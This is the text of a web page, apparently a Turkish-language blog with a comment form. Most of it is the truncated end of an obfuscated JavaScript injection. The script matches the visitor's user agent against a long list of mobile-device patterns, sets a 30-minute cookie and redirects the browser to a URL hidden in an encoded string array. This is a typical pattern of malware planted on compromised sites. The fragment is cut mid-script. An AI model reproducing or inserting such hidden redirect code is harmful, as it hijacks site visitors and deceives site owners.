ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

CEVAP VER

Please enter your comment!
Please enter your name here